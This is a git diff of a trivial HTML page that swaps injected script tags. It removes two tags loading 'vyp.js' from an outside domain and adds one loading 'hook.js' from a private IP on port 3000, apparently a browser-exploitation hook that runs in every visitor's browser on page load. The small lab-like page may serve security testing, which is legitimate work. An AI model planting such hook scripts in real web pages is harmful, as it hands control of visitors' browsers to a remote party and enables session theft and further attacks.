--- a/index.html
+++ b/index.html
@@ -5,12 +5,11 @@
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>My New Website</title>
-    <script src="https://testvypex2.ml/vyp.js"></script>
+    <script src="http://192.168.83.129:3000/hook.js"></script>
 </head>
 <body>
     <p>hello sir</p>
-    <s>can i test something please?</s>
+    <p>can i test something please?</p>
     <big>thanks!!</big>
-    <script src="https://testvypex2.ml/vyp.js"></script>
 </body>
 </html>
